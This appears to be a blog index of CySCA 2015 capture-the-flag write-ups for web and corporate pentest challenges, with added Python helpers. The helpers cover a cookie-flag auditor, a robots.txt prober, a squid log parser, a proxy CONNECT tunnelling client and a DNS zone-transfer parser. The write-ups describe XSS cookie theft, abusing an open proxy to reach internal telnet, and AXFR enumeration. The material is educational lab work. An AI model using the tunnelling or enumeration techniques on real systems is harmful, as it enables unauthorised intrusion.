CySCA 2015 Writeups

I’ve recently published all my writeups for CySCA 2015’s Web Pentest component, as well as for Corporate Pentest; however, the Corporate Pentest writeups are incomplete.

Corporate Pentest

Some writeups based on my experience during the competition. This was the first time I had ever experimented with corporate pentest style problems, which is why I did not get very far. I do, however, wish to share my experience.

  1. Danger Zone
  2. Sales Pitch
  3. Explain This: Sales Pitch
  4. Murphys Law
  5. Flash Flood

Web Applications Pentest

Whilst writing these writeups, I actually stepped through them using the CySCA 2015 challenges, rather than guessing them from the notes I had taken during the competition.

CySCA have yet to release a “CySCA In A Box”, so rather than making the challenges work just for me, I thought it would be beneficial to create a Vagrant environment so that anyone can get the challenges up and running in no time at all.

Head on over to this repo/page on my github for instructions on getting set up.

  1. In Plain Sight
  2. Bots Dream Of Electric Flags
  3. The Eagle Has Landed
  4. Love Letters
  5. Business Excellence
  6. Turn It On And Off
  7. Terminal Situation

If you’ve got any questions, feel free to tweet me: @nickw444

CySCA 2015 - Web Application Pentest 6 - Terminal Situation

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

It’s no coincidence this challenge is called Terminal Situation: we have a terminal sitting right in front of us.

Continue reading →

CySCA 2015 - Web Application Pentest 5 - Turn it On & Off Again

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

Logged in as an executive, we have some additional functionality: another menu item, “IT Support”, and the “Executive Board” option on the home page.

Continue reading →

CySCA 2015 - Web Application Pentest 4 - Business Excellence

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

We need to gain access to the CVO’s (Angelina’s) account. To do this we will most likely need to steal her session cookie. We take a look at the leave details section and put in a leave request to see whether it is protected against XSS. We also notice that the session cookie on this website is not flagged HttpOnly. Time to steal.

The browser refuses to expose HttpOnly cookies to JavaScript (document.cookie omits them), so if the session cookie were HttpOnly an XSS payload could not read it and we would be looking in the wrong place.

We do the naive thing and just put <h1>Hello</h1> in. However, the ticker spits out WARNING: XSS detected! You have been reported. It also appears that the XSS is stripped client-side.
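Checking the cookie flags by hand in the browser’s dev tools is fine for one site; the following added Python example (not part of the original writeup) performs the same check on raw Set-Cookie headers and reports what is missing. Both headers are constructed: the first mirrors the challenge’s session cookie, which lacks HttpOnly (the cookie name is made up), and the second is a hardened cookie for contrast.

```python
"""Audit Set-Cookie headers for the flags that decide whether an XSS can
steal the session.

Added example, not part of the original writeup. Both headers are
constructed: the first mirrors the challenge's session cookie, which lacks
HttpOnly (the cookie name is made up); the second is hardened for contrast.
"""

SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=3f9a1c2e7b; path=/",
    "Set-Cookie: csrf=9d1f; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attrs). Attribute names
    are lower-cased; flag attributes such as Secure and HttpOnly map to True."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() or True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """Return (cookie_name, issues) for one Set-Cookie header.

    missing HttpOnly      -> document.cookie exposes it to injected JavaScript,
                             the condition the cookie theft in the post relies on
    missing Secure        -> also sent over plain HTTP, so readable on the wire
    SameSite absent/None  -> attached to cross-site requests (CSRF)
    """
    name, _, attrs = parse_set_cookie(header)
    issues = []
    if "httponly" not in attrs:
        issues.append("missing HttpOnly")
    if "secure" not in attrs:
        issues.append("missing Secure")
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True:
        issues.append("missing SameSite")
    elif samesite.lower() == "none":
        issues.append("SameSite=None")
    return name, issues


def audit_response_headers(headers):
    """Run audit_cookie over every Set-Cookie line in a response."""
    return [audit_cookie(h) for h in headers if h.lower().startswith("set-cookie:")]


if __name__ == "__main__":
    for cookie_name, issues in audit_response_headers(SAMPLE_HEADERS):
        print(cookie_name, issues or ["ok"])
```

Run it against the headers a real response returns (for example the output of curl -i) and anything reported as “missing HttpOnly” is a cookie that an XSS payload can read out of document.cookie.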

Continue reading →

CySCA 2015 - Web Application Pentest 3 - Love Letters

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

Now that we’re logged in, let’s take a poke around and see what we’re dealing with. There appear to be sections to:

  • Apply for leave, where we submit a text request. Maybe XSS or Injection on this?
  • Staff Directory, details about different staff members.
    • The “Network Administrator” has a binary string in his profile. We’ll decode that later.
  • There seems to also be a message board. Maybe XSS or Injection.
  • There’s also a mail inbox.
Continue reading →

CySCA 2015 - Web Application Pentest 2 - The Eagle Has Landed

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

We need to obtain a working account on the system.

We register with the following details:

Name: Nick
Email: [email protected]
Password: nick
Confirm: nick
Secret Q: q
Secret A: a

We notice a message at the top:

Account Registered - Awaiting IT approval.

Continue reading →

CySCA 2015 - Web Application Pentest 1 - Bots Dream of Electric Flags

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

Our WebSec foo tells us we should have a look at robots.txt. Not only that, the title gives this one away: Bots.

GET /robots.txt HTTP/1.1

User-agent: *
Disallow: /admin
Disallow: /backup
Disallow: /protected

Let’s take a look at these.

  • /admin - Nothing here, just a picture
  • /backup - Nothing here, just another picture
  • /protected - Reveals the flag FLAG{1b000000000000000000000000000000}
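As an added example (not from the original post), here is a small Python helper that pulls the Disallow entries out of a robots.txt body, coping with comments, wildcards and multiple User-agent groups, and can then probe each one. The robots.txt text is the one the challenge returned; probe() takes a base URL you supply, since the post never names the target host, and it is not run automatically.

```python
"""Pull candidate paths out of robots.txt and (optionally) probe them.

Added example, not from the original writeup. SAMPLE_ROBOTS is the body the
challenge returned; probe() assumes a base URL you supply (the post never
names the host) and is not called unless you call it.
"""
import re
import urllib.error
import urllib.request

SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin
Disallow: /backup
Disallow: /protected
"""


def disallowed_paths(robots_txt):
    """Return the distinct Disallow paths from a robots.txt body, in order.

    Every User-agent group is included: a path hidden from one crawler is
    still a path the site owner would rather you did not see. Comments
    (#...), empty "Disallow:" entries (which mean "allow all") and wildcard
    or anchor suffixes (/foo/* or /foo$) are stripped so the result is a
    list of concrete prefixes to request.
    """
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        if field.lower() != "disallow" or not value:
            continue
        path = re.sub(r"[*$].*$", "", value)
        if path and path not in paths:
            paths.append(path)
    return paths


def probe(base_url, paths, timeout=5):
    """GET each path and return {path: status}, or 'ERR' on a network error.

    base_url is an assumption (e.g. "http://target"): the post does not give it.
    """
    results = {}
    for path in paths:
        req = urllib.request.Request(base_url.rstrip("/") + path,
                                     headers={"User-Agent": "Mozilla/5.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[path] = resp.status
        except urllib.error.HTTPError as exc:
            results[path] = exc.code        # a 403 or 401 is still worth noting
        except (urllib.error.URLError, OSError):
            results[path] = "ERR"
    return results


if __name__ == "__main__":
    for p in disallowed_paths(SAMPLE_ROBOTS):
        print(p)
```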

CySCA 2015 - Web Application Pentest 0 - In Plain Sight

Note: If you're interested in actually doing these challenges, check out this post on how to get the environment set up.

This was an easy one: snoop around the HTML source of the login page. You’ll find an HTML comment around line 99:

<!-- X marks the spot -->
<!-- RkxBR3sxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMH0N -->

The second comment looks like Base64, so we decode it:

>>> import base64
>>> encoded = 'RkxBR3sxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMH0N'
>>> print(base64.b64decode(encoded).decode('ascii').rstrip())  # the trailing "0N" encodes a carriage return, so strip it
FLAG{1a000000000000000000000000000000}
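The same trick generalises. The following is an added Python example (not from the original writeup) that pulls every HTML comment out of a page and decodes the ones that look like Base64, keeping only results that decode to printable text so that hashes and binary blobs are ignored. The page markup is constructed around the two comments the challenge actually contained; the rest of it is made up.

```python
"""Find HTML comments in a page and decode any that look like Base64.

Added example, not part of the original writeup. SAMPLE_PAGE is constructed:
the two "X marks the spot" comments are the ones from the challenge, the
surrounding markup is invented.
"""
import base64
import binascii
import re
import string
from html.parser import HTMLParser

SAMPLE_PAGE = """<html><head><title>Login</title></head>
<body>
<!-- TODO: remove debug form -->
<form method="post"><input name="user"><input name="pass" type="password"></form>
<!-- X marks the spot -->
<!-- RkxBR3sxYTAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMH0N -->
</body></html>
"""

# Base64 alphabet only, reasonably long, optional padding.
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


class CommentCollector(HTMLParser):
    """Collect the text of every <!-- ... --> comment, in document order."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def html_comments(page):
    parser = CommentCollector()
    parser.feed(page)
    parser.close()
    return parser.comments


def decode_if_base64(text):
    """Return the decoded text if `text` is well-formed Base64 whose bytes are
    all printable ASCII, otherwise None (so hashes and binary are skipped)."""
    if not BASE64_RE.match(text) or len(text) % 4:
        return None
    try:
        raw = base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None
    decoded = raw.decode("ascii", errors="replace")
    if not all(ch in string.printable for ch in decoded):
        return None
    return decoded.strip()  # the challenge string ends in an encoded "\r"


def hidden_strings(page):
    """Map each Base64-looking comment in the page to its decoded value."""
    found = {}
    for comment in html_comments(page):
        decoded = decode_if_base64(comment)
        if decoded is not None:
            found[comment] = decoded
    return found


if __name__ == "__main__":
    for encoded, decoded in hidden_strings(SAMPLE_PAGE).items():
        print(encoded, "->", decoded)
```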

CySCA 2015 - Corporate Pentest 3.0 - Flash Flood

We are now connected to the company’s proxy. We are given the hint early on that:

“Consider that the ECWI system is secure and does not allow direct traffic from the DMZ to the internal network. Additionally, it does not allow direct connections on arbitrary ports from the internal network to the DMZ.”

We perform some network connection analysis using ifconfig, route, arp and netstat, and also look at the squid access log.
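As an added example (not from the original post), here is a Python parser for squid’s native access.log format that summarises which hosts the proxy has fetched for which clients and flags CONNECT tunnels to non-HTTPS ports, the kind of entry the telnet trick from Murphy’s Law leaves behind. The log lines are constructed; apart from the proxy’s internal address 10.10.5.30, every client and host in them is made up.

```python
"""Parse squid's native access.log and summarise what the proxy has been used
to reach.

Added example, not from the original writeup. The lines below are constructed
in squid's default native format (timestamp, elapsed ms, client, result/status,
bytes, method, URL, ident, hierarchy/peer, content type); apart from the proxy's
internal address 10.10.5.30 every host and client is made up.
"""
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE_LOG = """\
1443600001.123    312 10.10.5.20 TCP_MISS/200 4521 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html
1443600002.456     18 10.10.5.20 TCP_MISS/200 1203 GET http://updates.example.com/patch.list - HIER_DIRECT/93.184.216.35 text/plain
1443600010.001    940 203.0.113.7 TCP_MISS/200 2210 GET http://10.10.5.30/management/ - HIER_DIRECT/10.10.5.30 text/html
1443600011.250   5310 203.0.113.7 TCP_TUNNEL/200 890 CONNECT 10.10.5.30:23 - HIER_DIRECT/10.10.5.30 -
1443600012.000     40 10.10.5.21 TCP_TUNNEL/200 15200 CONNECT www.example.com:443 - HIER_DIRECT/93.184.216.34 -
"""

FIELDS = ("timestamp", "elapsed_ms", "client", "result", "bytes",
          "method", "url", "ident", "hierarchy", "content_type")


def parse_squid_line(line):
    """Return the native-format fields as a dict plus dest_host/dest_port.
    Raises ValueError on lines that do not have the ten native fields."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        raise ValueError("not a native-format squid line: %r" % line)
    rec = dict(zip(FIELDS, parts))
    rec["status"] = int(rec["result"].split("/")[1])
    if rec["method"] == "CONNECT":             # URL is bare host:port
        host, _, port = rec["url"].rpartition(":")
        rec["dest_host"], rec["dest_port"] = host, int(port)
    else:
        u = urlsplit(rec["url"])
        rec["dest_host"] = u.hostname
        rec["dest_port"] = u.port or (443 if u.scheme == "https" else 80)
    return rec


def parse_log(text):
    return [parse_squid_line(l) for l in text.splitlines() if l.strip()]


def reachable_from(records):
    """client -> sorted host:port list the proxy fetched on that client's behalf."""
    seen = defaultdict(set)
    for r in records:
        seen[r["client"]].add("%s:%d" % (r["dest_host"], r["dest_port"]))
    return {client: sorted(dests) for client, dests in seen.items()}


def suspicious_tunnels(records):
    """Successful CONNECTs to anything but 443: this is how an open proxy gets
    turned into a generic TCP relay (telnet on 23, for instance)."""
    return [r for r in records
            if r["method"] == "CONNECT" and r["dest_port"] != 443 and r["status"] == 200]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for client, dests in reachable_from(recs).items():
        print(client, dests)
    for r in suspicious_tunnels(recs):
        print("tunnel:", r["client"], "->", r["url"])
```

Point parse_log at the real /var/log/squid3/access.log and the reachable_from() summary tells you at a glance which internal addresses clients have been fetching through the proxy, which is exactly the information the challenge hint says you should not be able to obtain directly.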

Continue reading →

CySCA 2015 - Corporate Pentest 2.0 - Murphys Law

From Sales Pitch we know the server has some internally bound services, most notably telnet (port 23); these are listed on the internal management page, which is only accessible from inside the network.

Fortunately, telnet is a text-based protocol, so we can simply issue an HTTP CONNECT request to the proxy and have it tunnel us through. The request must be terminated by an empty line (press Enter twice) before the proxy replies with an HTTP 200 and starts relaying bytes.

$> telnet 172.16.5.30 3128
CONNECT 10.10.5.30:23 HTTP/1.0

Continue reading →
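Here is the same CONNECT exchange in Python, as an added example that is not part of the original writeup. It covers both Sales Pitch and Murphy’s Law, since it is the open proxy from Sales Pitch that makes the tunnel possible. open_tunnel() speaks the real protocol and could be pointed at the lab proxy; the in-process stand-in proxy and its “login: ” banner are constructed so the script runs offline, and the stand-in deliberately honours any CONNECT, which is the misconfiguration being abused.

```python
"""Tunnel a raw TCP session through an HTTP proxy with CONNECT, the way the
writeup does by hand with telnet.

Added example, not part of the original writeup. open_tunnel() speaks the real
protocol; the proxy at the bottom is a constructed in-process stand-in (and the
"login: " banner is made up) so the script runs offline. Like the challenge's
squid it honours CONNECT to any host:port, which is the misconfiguration abused.
"""
import socket
import threading


def build_connect_request(host, port):
    # The empty line is mandatory: the proxy acts only once it has seen CRLFCRLF.
    return ("CONNECT %s:%d HTTP/1.0\r\nHost: %s:%d\r\n\r\n"
            % (host, port, host, port)).encode()


def parse_connect_response(data):
    """Return (status_code, bytes_after_headers); raise ValueError if the
    headers are not complete or the first line is not an HTTP status line."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete response")
    status_line = head.split(b"\r\n", 1)[0].split()
    if len(status_line) < 2 or not status_line[0].startswith(b"HTTP/"):
        raise ValueError("not an HTTP status line: %r" % head)
    return int(status_line[1]), rest


def open_tunnel(proxy_host, proxy_port, target_host, target_port, timeout=5):
    """Return (socket, leftover): the socket now talks to target_host:port
    through the proxy; leftover is any tunnelled data (e.g. a telnet banner)
    that arrived in the same read as the proxy's headers."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    sock.sendall(build_connect_request(target_host, target_port))
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            sock.close()
            raise ConnectionError("proxy closed before answering CONNECT")
        buf += chunk
    status, leftover = parse_connect_response(buf)
    if status != 200:
        sock.close()
        raise ConnectionError("proxy refused CONNECT: %d" % status)
    return sock, leftover


# --- constructed stand-in so the example runs offline ----------------------

def _serve_open_proxy(listener, banner):
    """Accept one client, grant whatever CONNECT it asks for, send a fake
    service banner, then echo the first line back tagged with the target."""
    conn, _ = listener.accept()
    with conn:
        req = b""
        while b"\r\n\r\n" not in req:
            chunk = conn.recv(4096)
            if not chunk:
                return
            req += chunk
        target = req.split(b" ", 2)[1]           # host:port from the request line
        conn.sendall(b"HTTP/1.0 200 Connection established\r\n\r\n" + banner)
        data = conn.recv(4096)
        conn.sendall(b"[" + target + b"] " + data)


def demo():
    """Drive the exchange against the stand-in proxy; returns the bytes the
    fake telnet service sent back through the tunnel."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    worker = threading.Thread(target=_serve_open_proxy, args=(listener, b"login: "))
    worker.start()
    sock, reply = open_tunnel("127.0.0.1", port, "10.10.5.30", 23)
    with sock:
        sock.sendall(b"admin\r\n")
        while True:                              # read until the far end closes
            chunk = sock.recv(4096)
            if not chunk:
                break
            reply += chunk
    worker.join()
    listener.close()
    return reply


if __name__ == "__main__":
    print(demo())
```

Against a real proxy, replace the demo() wiring with open_tunnel("172.16.5.30", 3128, "10.10.5.30", 23) and drive the returned socket as you would the telnet session; a proxy that is configured correctly answers the CONNECT with a 403 and open_tunnel() raises.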

CySCA 2015 - Corporate Pentest 1.1 - Explain This Sales Pitch

Task: Explain the misconfiguration of the squid proxy

NB: this could only be answered once the flag for Murphy’s Law was captured, since there was no easy way to cat /etc/squid3/squid.conf otherwise.

This is due to a misconfiguration in the proxy configuration file:

$> cat /etc/squid3/squid.conf
Continue reading →

CySCA 2015 - Corporate Pentest 1.0 - Sales Pitch

Task: Connect to the management panel of the proxy server

The proxy is misconfigured, allowing anyone on the outside to use it to reach internal infrastructure.

We take advantage of this and point our HTTP proxy setting at it; however, we still don’t know the box’s internal IP.

We try 127.0.0.1 via the proxy, with no luck. Upon inspecting the “Frontend” page we realise it has INT: x.x.x.x EXT: x.x.x.x in the <title></title> HTML tag.

We load up the INT: x.x.x.x address via the proxy and the flag is revealed.

CySCA 2015 - Corporate Pentest 0.0 - Danger Zone

Similar to last year, we perform a zone transfer (AXFR) request against the domain’s name server. The server answers it for an arbitrary client, which dumps every record in the zone, including the flag.

$> dig -t axfr ecwi.cysca @ns.ecwi.cysca

; <<>> DiG 9.8.3-P1 <<>> -t axfr ecwi.cysca @ns.ecwi.cysca
;; global options: +cmd
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
ecwi.cysca.     86400   IN  NS  ns.ecwi.cysca.
ecwi.cysca.     86400   IN  A   172.16.5.80
ns.ecwi.cysca.      300 IN  A   172.16.5.53
proxy.ecwi.cysca.   300 IN  A   172.16.5.30
support.ecwi.cysca. 300 IN  A   172.16.5.85
www.ecwi.cysca.     300 IN  A   172.16.5.80
zonetransferflag.ecwi.cysca. 300 IN TXT "FLAG{749929CE145DD73A8D1530E2170B1587}"
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
;; Query time: 221 msec
;; SERVER: 172.16.5.53#53(172.16.5.53)
;; WHEN: Wed Sep 30 19:35:44 2015
;; XFR size: 9 records (messages 1, bytes 289)
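As an added example (not from the original post), here is a Python parser for dig’s AXFR output that turns the dump into a host list, pulls out the TXT records, and checks that the transfer is whole: a correct AXFR begins and ends with the zone’s SOA and both copies must carry the same serial, otherwise the server cut the stream and you do not have the full zone. The input is the dig output above, reproduced so the code runs offline.

```python
"""Parse `dig -t axfr` output into records and check the transfer is whole.

Added example, not part of the original writeup; DIG_OUTPUT is the dig output
shown in the post, reproduced so the code runs offline.
"""
import re

DIG_OUTPUT = """\
; <<>> DiG 9.8.3-P1 <<>> -t axfr ecwi.cysca @ns.ecwi.cysca
;; global options: +cmd
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
ecwi.cysca.     86400   IN  NS  ns.ecwi.cysca.
ecwi.cysca.     86400   IN  A   172.16.5.80
ns.ecwi.cysca.      300 IN  A   172.16.5.53
proxy.ecwi.cysca.   300 IN  A   172.16.5.30
support.ecwi.cysca. 300 IN  A   172.16.5.85
www.ecwi.cysca.     300 IN  A   172.16.5.80
zonetransferflag.ecwi.cysca. 300 IN TXT "FLAG{749929CE145DD73A8D1530E2170B1587}"
ecwi.cysca.     86400   IN  SOA ns.ecwi.cysca. admin.ecwi.cysca. 2015070401 28800 7200 864000 86400
;; Query time: 221 msec
;; SERVER: 172.16.5.53#53(172.16.5.53)
;; WHEN: Wed Sep 30 19:35:44 2015
;; XFR size: 9 records (messages 1, bytes 289)
"""

# name  ttl  class  type  rdata   (dig separates fields with tabs or spaces)
RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+(IN|CH|HS)\s+([A-Z0-9]+)\s+(.*)$")


def parse_axfr(text):
    """Return a list of (name, ttl, type, rdata) tuples, skipping dig's ';'
    commentary. rdata is kept as the raw string dig printed."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if not m:
            raise ValueError("unrecognised line: %r" % line)
        name, ttl, _cls, rtype, rdata = m.groups()
        records.append((name, int(ttl), rtype, rdata.strip()))
    return records


def check_complete(records):
    """True only if the dump starts and ends with the same zone's SOA and the
    two serials agree; anything else means a truncated transfer."""
    if len(records) < 2 or records[0][2] != "SOA" or records[-1][2] != "SOA":
        return False
    first_serial = records[0][3].split()[2]
    last_serial = records[-1][3].split()[2]
    return records[0][0] == records[-1][0] and first_serial == last_serial


def host_map(records):
    """name -> sorted addresses from A/AAAA records, ready for a target list."""
    hosts = {}
    for name, _ttl, rtype, rdata in records:
        if rtype in ("A", "AAAA"):
            hosts.setdefault(name.rstrip("."), []).append(rdata)
    return {n: sorted(addrs) for n, addrs in hosts.items()}


def txt_records(records):
    """(name, text) for each TXT record with the surrounding quotes removed;
    TXT is where SPF, verification tokens and, here, the flag turn up."""
    return [(name.rstrip("."), rdata.strip('"'))
            for name, _ttl, rtype, rdata in records if rtype == "TXT"]


if __name__ == "__main__":
    recs = parse_axfr(DIG_OUTPUT)
    print("complete:", check_complete(recs))
    print(host_map(recs))
    print(txt_records(recs))
```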